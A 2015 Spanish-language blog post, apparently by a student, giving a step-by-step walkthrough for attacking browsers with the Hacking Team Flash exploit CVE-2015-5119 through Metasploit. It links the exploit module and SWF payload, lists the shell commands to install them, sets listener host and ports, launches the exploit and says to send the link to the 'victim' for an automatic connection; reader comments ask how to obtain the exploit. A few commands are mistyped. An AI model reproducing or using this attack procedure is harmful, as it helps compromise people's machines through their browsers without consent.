sábado, 12 de septiembre de 2015

2015 Flash 0day exploit HackingTeam




Buenas tardes mis queridos lectores en esta oportunidad debo manifestar que mi blog lo eh abandonado demasiado tiempo, creo que no esta bien dejarlo de lado porque yo enseñando aprendo muchas muchas nuevas de este mundo de la seguridad informatica, por ende hare un compromiso de publicar un articulo por dia para actualizar el blog nuevamente como antes lo habia hecho, ante mano en esta oportunidad haremos un ataque por Metasploit Framework con el nuevo exploit que ha salido hace pocos meses que es el conocido 'CVE 2015-5119


Plataformas vulnerables:


        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
        Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and
        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.


Descarga del exploit:

http://downloads.securityfocus.com/vulnerabilities/exploits/75568.rb


Lo primero que debemos hacer es guardar el exploit con el nombre que deseen no hay problema.
lo pueden hacer por el editor de texto, en mi caso lo hice por terminal con el comando nano como pueden apreciar en la siguiente imagen:
una ves finalizado nuestro exploit estara en el directorio principal en este caso /root/. lo que haremos sera primero crear una carpeta y mover nuestro exploit a los modulos de metasploit.
java0day.rb

root@kali:~# mkdir .msf4/modules/exploits/hackingteam
root@kali:~# mv java0day.rb .msf4/modules/exploits/hackingteam
root@kali:~# ls .msf4/modules/exploits/hackingteam
java0day.rb
root@kali:~# 

Descarga del payload smf:

https://github.com/rapid7/metasploit-framework/blob/master/data/exploits/CVE-2015-5122/msf.swf


root@kali:~# mk dir -p /usr/share/metasploit-framework/data/exploits/CVE-2015-5119
root@kali:~# mv msf.swf / usr/share/metasploit-framework/data/exploits/CVE-2015-5119
root@kali:~# 


Una ves terminado, pasaremos abrir nuestro metasploit y añadiremos el siguiente comando para actualizar los modulos que añadimos.

msf > reload_all
[*] Reloading modules from all module paths...
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *



Ejecutando en exploit:

--------------------------------------------------------------------------------------------------------------------------
msf > use exploit/hackingteam/java0day

msf exploit(java0day) > set LPORT 8080

msf exploit(java0day) > set SRVPORT 80

msf exploit(java0day) > set URIPATH /

msf exploit(java0day) > set LHOST 192.168.219.128

msf exploit(java0day) > exploit
--------------------------------------------------------------------------------------------------------------------------


Mandamos el link a nuestra victima y automaticamente como siempre tendremos nuestra conexion establecida, saludos para todos.

No mostrare la explotacion de mi sistema, porque ya que sabemos como estamos adentro de un sistema.



4 comentarios:

  1. Descarga del exploit por que no puedo descargarlo soy nuevo en esto de ante mano mil gracias Omar Rodriguez excelente trabajo mi hermano

    ResponderEliminar
  2. Buenas noches, bueno el exploit no se descarga lo copias y lo pegas en un documento de texto y lo guardas en un extension .rb o lo puedes hacer con la terminal ejecutando el comando " nano " y pegando el documento y guardalo con la extension .rb como esta en el post, Saludos

    ResponderEliminar
  3. Me pasarias el link de ese wallpaper que tienes?

    ResponderEliminar

Datos del Autor


Obra de K. Haring

Hola, mi nombre es omar soy estudiante de Ingenieria de sistemas en Perú. actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.


"Me considero un novato en busca de conocimiento"


Entradas Populares